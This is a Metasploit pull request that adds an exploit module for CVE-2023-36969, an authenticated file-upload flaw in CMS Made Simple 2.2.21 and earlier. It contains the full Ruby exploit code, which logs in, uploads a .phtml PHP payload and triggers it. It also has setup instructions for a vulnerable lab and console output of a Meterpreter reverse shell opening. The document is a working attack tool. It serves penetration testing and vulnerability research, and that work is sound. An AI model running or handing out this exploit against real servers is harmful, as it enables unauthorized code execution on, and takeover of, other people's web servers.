### PR TITLE
Add CMSMadeSimple (CMSMS) File Manager Auth RCE (CVE-2023-36969)

### DIFF
--- a/documentation/modules/exploit/multi/http/cmsms_file_manager_auth_rce.md
+++ b/documentation/modules/exploit/multi/http/cmsms_file_manager_auth_rce.md
@@ -39,6 +39,7 @@ Download CMSMadeSimple, extract it and move it to `/var/www/html`:
 wget https://s3.amazonaws.com/cmsms/downloads/15179/cmsms-2.2.21-install.zip
 unzip cmsms-2.2.21-install.zip                
 sudo mv cmsms-2.2.21-install.php /var/www/html
+rm /var/www/html/index.html
 ```
 
 Set the necessary permissions:

--- a/documentation/modules/exploit/multi/http/cmsms_file_manager_auth_rce.md
+++ b/documentation/modules/exploit/multi/http/cmsms_file_manager_auth_rce.md
@@ -11,7 +11,7 @@ leading to RCE. The file can be executed by accessing its URL in the
 
 Install PHP dependencies:
 ```
-sudo apt install -y php-gd php-mbstring php-intl php-xml php-curl php-zip
+sudo apt install -y php-gd php-mbstring php-intl php-xml php-curl php-zip php-mysql mariadb-server mariadb-client apache2 libapache2-mod-php8.4 unzip wget 
 ```
 
 Start mariadb and apache:

--- a/documentation/modules/exploit/multi/http/cmsms_file_manager_auth_rce.md
+++ b/documentation/modules/exploit/multi/http/cmsms_file_manager_auth_rce.md
@@ -3,7 +3,7 @@
 CMS Made Simple <= v2.2.21 allows an authenticated administrator to upload files
 with the `.phar` or `.phtml` extensions, enabling execution of PHP code
 leading to RCE. The file can be executed by accessing its URL in the
-/uploads/ directory.
+`/uploads/` directory.
 
 ## Installation
 

--- a/documentation/modules/exploit/multi/http/cmsms_file_manager_auth_rce.md
+++ b/documentation/modules/exploit/multi/http/cmsms_file_manager_auth_rce.md
@@ -1,0 +1,103 @@
+## Vulnerable Application
+
+CMS Made Simple <= v2.2.21 allows an authenticated administrator to upload files
+with the `.phar` or `.phtml` extensions, enabling execution of PHP code
+leading to RCE. The file can be executed by accessing its URL in the
+/uploads/ directory.
+
+## Installation
+
+### Kali Linux 2024.3
+
+Install PHP dependencies:
+```
+sudo apt install -y php-gd php-mbstring php-intl php-xml php-curl php-zip
+```
+
+Start mariadb and apache:
+```
+sudo systemctl start apache2
+sudo systemctl start mariadb
+```
+
+Connect to the database:
+```
+sudo mysql -u root -p
+```
+
+Create a database user `msfuser` and a database named `cmsms`:
+```
+CREATE USER 'msfuser'@'localhost' IDENTIFIED BY 'msfpass';
+CREATE DATABASE cmsms;
+GRANT ALL PRIVILEGES on cmsms.* TO 'msfuser'@'localhost';
+FLUSH PRIVILEGES;
+EXIT;
+```
+
+Download CMSMadeSimple, extract it and move it to `/var/www/html`:
+```
+wget https://s3.amazonaws.com/cmsms/downloads/15179/cmsms-2.2.21-install.zip
+unzip cmsms-2.2.21-install.zip                
+sudo mv cmsms-2.2.21-install.php /var/www/html
+```
+
+Set the necessary permissions:
+```
+sudo chmod 755 -R /var/www/html/
+sudo chown www-data:www-data -R /var/www/html/
+```
+
+The application should be now available at `http://localhost/cmsms-2.2.21-install.php/`,
+navigate there in a browser to complete the setup wizard.
+On the tests page, `Testing if we can change INI settings` warning can be ignored.
+It will ask you for the database credentials created above, input them and enter `cmsms` for database name.
+
+Once complete, go to `http://localhost/admin/login.php`, you should see an admin login panel.
+
+## Verification Steps
+
+1. Install CMSMadeSimple
+2. Start msfconsole
+3. Do: `use exploit/multi/http/cmsms_file_manager_auth_rce`
+4. Do: `set RHOST [IP]`
+5. Do: `set username [username]`
+6. Do: `set password [password]`
+7. Do: `run`
+8. You should get a shell.
+
+## Options
+
+### USERNAME
+The username for the CMSMS admin panel. Default is empty string
+
+### PASSWORD
+The password for the CMSMS admin panel. Default is empty string
+
+## Scenarios
+
+### CMSMadeSimple v2.2.21 on Kali Linux 2024.3
+
+```
+msf6 > use exploit/multi/http/cmsms_file_manager_auth_rce 
+[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
+msf6 exploit(multi/http/cmsms_file_manager_auth_rce) > set RHOST 127.0.0.1
+RHOST => 127.0.0.1
+msf6 exploit(multi/http/cmsms_file_manager_auth_rce) > set username admin
+username => admin
+msf6 exploit(multi/http/cmsms_file_manager_auth_rce) > set password password
+password => password
+msf6 exploit(multi/http/cmsms_file_manager_auth_rce) > run
+[*] Started reverse TCP handler on 192.168.232.128:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable.
+[*] Sending stage (40004 bytes) to 192.168.232.128
+[*] Meterpreter session 1 opened (192.168.232.128:4444 -> 192.168.232.128:42794) at 2025-03-22 02:53:16 -0400
+
+meterpreter > getuid
+Server username: www-data
+meterpreter > sysinfo
+Computer    : kali
+OS          : Linux kali 6.8.11-amd64 #1 SMP PREEMPT_DYNAMIC Kali 6.8.11-1kali2 (2024-05-30) x86_64
+Meterpreter : php/linux
+meterpreter >
+```

--- a/modules/exploits/multi/http/cmsms_file_manager_auth_rce.rb
+++ b/modules/exploits/multi/http/cmsms_file_manager_auth_rce.rb
@@ -104,12 +104,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'vars_post' => data,
       'keep_cookies' => true
     )
-
-    fail_with(Failure::Unreachable, 'A response was not recieved from the remote host') unless res
-
-    unless res.code == 302 && cookie_jar.cookies && res.headers['Location'] =~ %r{/admin$}
-      fail_with(Failure::NoAccess, 'Authentication was unsuccessful')
-    end
+    fail_with(Failure::NoAccess, 'Authentication was unsuccessful') unless res&.code == 302 && cookie_jar.cookies && res.headers['Location'] =~ %r{/admin$}
 
     store_valid_credential(user: datastore['USERNAME'], private: datastore['PASSWORD'])
     vprint_good("#{peer} - Authentication was successful")

--- a/modules/exploits/multi/http/cmsms_file_manager_auth_rce.rb
+++ b/modules/exploits/multi/http/cmsms_file_manager_auth_rce.rb
@@ -83,7 +83,8 @@ class MetasploitModule < Msf::Exploit::Remote
     set_cookie = res.get_cookies
     return CheckCode::Safe unless set_cookie&.match?(/^CMSSESSID/)
 
-    version = Rex::Version.new(res.body.scan(%r{CMS Made Simple</a> version (\d+\.\d+\.\d+)}).flatten.first)
+    html = res.get_html_document
+    version = Rex::Version.new(html.at('p.copyright-info').text.scan(/\d+\.\d+\.\d+/).first)
     vprint_status("#{peer} - CMS Made Simple Version: #{version}")
 
     return CheckCode::Appears if version <= Rex::Version.new('2.2.21')

--- a/modules/exploits/multi/http/cmsms_file_manager_auth_rce.rb
+++ b/modules/exploits/multi/http/cmsms_file_manager_auth_rce.rb
@@ -1,0 +1,155 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::PhpEXE
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'CmsMadeSimple Authenticated File Manager RCE',
+        'Description' => '
+        CMS Made Simple <= v2.2.21 allows an authenticated administrator to upload files
+        with the .phar or .phtml extensions, enabling execution of PHP code
+        leading to RCE. The file can be executed by accessing its URL in the
+        /uploads/ directory.
+
+        Tested on v2.2.21, v2.2.18, v2.2.17, v2.2.16, v2.2.15, v2.2.14
+        ',
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Okan Kurtuluş',	# Initial research
+          'Mirabbas Ağalarov',	# EDB PoC
+          'tastyrice'	# Metasploit Module
+        ],
+        'References' => [
+          ['CVE', '2023-36969'],
+          ['EDB', '51600']
+        ],
+        'Platform' => ['php'],
+        'Arch' => ARCH_PHP,
+        'Targets' => [
+          [
+            'Universal', {}
+          ]
+        ],
+        'Privileged' => false,
+        'DisclosureDate' => '2023-06-07',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'Base directory path for cmsms', '/']),
+        OptString.new('USERNAME', [true, 'Username to authenticate with', '']),
+        OptString.new('PASSWORD', [true, 'Password to authenticate with', ''])
+      ]
+    )
+  end
+
+  def get(path, filename)
+    send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, path, filename),
+      'method' => 'GET'
+    )
+  end
+
+  def post(uri, data)
+    send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'admin', uri),
+      'method' => 'POST',
+      'vars_post' => data,
+      'cookie' => @cookies
+    )
+  end
+
+  def multipart_form_data(uri, data, message)
+    send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'admin', uri),
+      'method' => 'POST',
+      'data' => data,
+      'ctype' => "multipart/form-data; boundary=#{message.bound}",
+      'cookie' => @cookies
+    )
+  end
+
+  def check
+    res = get('', 'index.php')
+    unless res
+      vprint_error('Connection Failed')
+      return CheckCode::Unknown
+    end
+
+    set_cookie = res.get_cookies
+    return CheckCode::Safe unless set_cookie&.match?(/^CMSSESSID/)
+
+    version = Rex::Version.new(res.body.scan(%r{CMS Made Simple</a> version (\d+\.\d+\.\d+)}).flatten.first)
+    vprint_status("#{peer} - CMS Made Simple Version: #{version}")
+
+    return CheckCode::Appears if version <= Rex::Version.new('2.2.21')
+
+    CheckCode::Detected
+  end
+
+  def login
+    data = {
+      'username' => datastore['USERNAME'],
+      'password' => datastore['PASSWORD'],
+      'loginsubmit' => 'Submit'
+    }
+    res = post('login.php', data)
+    @cookies = res.get_cookies
+
+    fail_with(Failure::Unreachable, 'A response was not recieved from the remote host') unless res
+
+    unless res.code == 302 && @cookies && res.headers['Location'] =~ %r{/admin$}
+      fail_with(Failure::NoAccess, 'Authentication was unsuccessful')
+    end
+
+    store_valid_credential(user: datastore['USERNAME'], private: datastore['PASSWORD'])
+    vprint_good("#{peer} - Authentication was successful")
+  end
+
+  def send_file
+    filename = "#{rand_text_alpha(8..12)}.phtml"
+    c = @cookies.scan(/c=([^;]+)/).last&.first
+    payload = get_write_exec_payload(unlink_self: true)
+
+    # create the message with payload
+    message = Rex::MIME::Message.new
+    message.add_part('FileManager,m1_,upload,0', nil, nil, 'form-data; name="mact"')
+    message.add_part(c, nil, nil, 'form-data; name="__c"')
+    message.add_part('1', nil, nil, 'form-data; name="disable_buffer"')
+    message.add_part(payload, nil, nil, "form-data; name=\"m1_files[]\"; filename=\"#{filename}\"")
+    data = message.to_s
+
+    # send payload
+    payload_res = multipart_form_data('moduleinterface.php', data, message)
+    fail_with(Failure::UnexpectedReply, 'Failed to upload the file') unless payload_res && payload_res.code == 200
+    vprint_good("#{peer} - File uploaded #{filename}")
+
+    # open shell
+    res = get('uploads', filename)
+    return unless res && res.code == 404
+
+    print_error("Shell #{shell_name} not found")
+  end
+
+  def exploit
+    login
+    send_file
+  end
+end

--- a/modules/exploits/multi/http/cmsms_file_manager_auth_rce.rb
+++ b/modules/exploits/multi/http/cmsms_file_manager_auth_rce.rb
@@ -66,7 +66,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'method' => 'POST',
       'data' => data,
       'ctype' => "multipart/form-data; boundary=#{message.bound}",
-      'cookie' => @cookies
+      'keep_cookies' => true
     )
   end
 
@@ -102,13 +102,12 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => normalize_uri(target_uri.path, 'admin', 'login.php'),
       'method' => 'POST',
       'vars_post' => data,
-      'cookie' => @cookies
+      'keep_cookies' => true
     )
-    @cookies = res.get_cookies
 
     fail_with(Failure::Unreachable, 'A response was not recieved from the remote host') unless res
 
-    unless res.code == 302 && @cookies && res.headers['Location'] =~ %r{/admin$}
+    unless res.code == 302 && cookie_jar.cookies && res.headers['Location'] =~ %r{/admin$}
       fail_with(Failure::NoAccess, 'Authentication was unsuccessful')
     end
 
@@ -118,7 +117,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def send_file
     filename = "#{rand_text_alpha(8..12)}.phtml"
-    c = @cookies.scan(/c=([^;]+)/).last&.first
+    c = cookie_jar.cookies.find { |cookie| cookie.name == '__c' }.value
     payload = get_write_exec_payload(unlink_self: true)
 
     # create the message with payload

--- a/modules/exploits/multi/http/cmsms_file_manager_auth_rce.rb
+++ b/modules/exploits/multi/http/cmsms_file_manager_auth_rce.rb
@@ -75,7 +75,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => normalize_uri(target_uri.path, '', 'index.php'),
       'method' => 'GET'
     )
-    unless res
+    unless res && res.code == 200
       vprint_error('Connection Failed')
       return CheckCode::Unknown
     end

--- a/modules/exploits/multi/http/cmsms_file_manager_auth_rce.rb
+++ b/modules/exploits/multi/http/cmsms_file_manager_auth_rce.rb
@@ -60,22 +60,6 @@ class MetasploitModule < Msf::Exploit::Remote
     )
   end
 
-  def get(path, filename)
-    send_request_cgi(
-      'uri' => normalize_uri(target_uri.path, path, filename),
-      'method' => 'GET'
-    )
-  end
-
-  def post(uri, data)
-    send_request_cgi(
-      'uri' => normalize_uri(target_uri.path, 'admin', uri),
-      'method' => 'POST',
-      'vars_post' => data,
-      'cookie' => @cookies
-    )
-  end
-
   def multipart_form_data(uri, data, message)
     send_request_cgi(
       'uri' => normalize_uri(target_uri.path, 'admin', uri),
@@ -87,7 +71,10 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    res = get('', 'index.php')
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, '', 'index.php'),
+      'method' => 'GET'
+    )
     unless res
       vprint_error('Connection Failed')
       return CheckCode::Unknown
@@ -110,7 +97,12 @@ class MetasploitModule < Msf::Exploit::Remote
       'password' => datastore['PASSWORD'],
       'loginsubmit' => 'Submit'
     }
-    res = post('login.php', data)
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'admin', 'login.php'),
+      'method' => 'POST',
+      'vars_post' => data,
+      'cookie' => @cookies
+    )
     @cookies = res.get_cookies
 
     fail_with(Failure::Unreachable, 'A response was not recieved from the remote host') unless res
@@ -142,7 +134,10 @@ class MetasploitModule < Msf::Exploit::Remote
     vprint_good("#{peer} - File uploaded #{filename}")
 
     # open shell
-    res = get('uploads', filename)
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'uploads', filename),
+      'method' => 'GET'
+    )
     return unless res && res.code == 404
 
     print_error("Shell #{shell_name} not found")

--- a/modules/exploits/multi/http/cmsms_file_manager_auth_rce.rb
+++ b/modules/exploits/multi/http/cmsms_file_manager_auth_rce.rb
@@ -15,14 +15,14 @@ class MetasploitModule < Msf::Exploit::Remote
       update_info(
         info,
         'Name' => 'CmsMadeSimple Authenticated File Manager RCE',
-        'Description' => '
-        CMS Made Simple <= v2.2.21 allows an authenticated administrator to upload files
-        with the .phar or .phtml extensions, enabling execution of PHP code
-        leading to RCE. The file can be executed by accessing its URL in the
-        /uploads/ directory.
+        'Description' => %q{
+          CMS Made Simple <= v2.2.21 allows an authenticated administrator to upload files
+          with the .phar or .phtml extensions, enabling execution of PHP code
+          leading to RCE. The file can be executed by accessing its URL in the
+          /uploads/ directory.
 
-        Tested on v2.2.21, v2.2.18, v2.2.17, v2.2.16, v2.2.15, v2.2.14
-        ',
+          Tested on v2.2.21, v2.2.18, v2.2.17, v2.2.16, v2.2.15, v2.2.14.
+        },
         'License' => MSF_LICENSE,
         'Author' => [
           'Okan Kurtuluş',	# Initial research


### PR DESCRIPTION
Add CMSMadeSimple (CMSMS) File Manager Auth File Upload RCE exploit.
```
CMS Made Simple <= v2.2.21 allows an authenticated administrator to upload files
with the .phar or .phtml extensions, enabling execution of PHP code
leading to RCE. The file can be executed by accessing its URL in the
/uploads/ directory.
```

## Verification

- [x] Start msfconsole
- [x] Do: `use exploit/multi/http/cmsms_file_manager_auth_rce`
- [x] Do: `set RHOST [IP]`
- [x] Do: `set username [username]`
- [x] Do: `set password [password]`
- [x] Do: `run`
- [x] You should get a shell.

## Scenarios
```
 msf6 > use exploit/multi/http/cmsms_file_manager_auth_rce 
 [*] No payload configured, defaulting to php/meterpreter/reverse_tcp
 msf6 exploit(multi/http/cmsms_file_manager_auth_rce) > set RHOST 127.0.0.1
 RHOST => 127.0.0.1
 msf6 exploit(multi/http/cmsms_file_manager_auth_rce) > set username admin
 username => admin
 msf6 exploit(multi/http/cmsms_file_manager_auth_rce) > set password password
 password => password
 msf6 exploit(multi/http/cmsms_file_manager_auth_rce) > run
 [*] Started reverse TCP handler on 192.168.232.128:4444 
 [*] Running automatic check ("set AutoCheck false" to disable)
 [+] The target appears to be vulnerable.
 [*] Sending stage (40004 bytes) to 192.168.232.128
 [*] Meterpreter session 1 opened (192.168.232.128:4444 -> 192.168.232.128:42794) at 2025-03-22 02:53:16 -0400
 
 meterpreter > getuid
 Server username: www-data
 meterpreter > sysinfo
 Computer    : kali
 OS          : Linux kali 6.8.11-amd64 #1 SMP PREEMPT_DYNAMIC Kali 6.8.11-1kali2 (2024-05-30) x86_64
 Meterpreter : php/linux
 meterpreter >
 ```
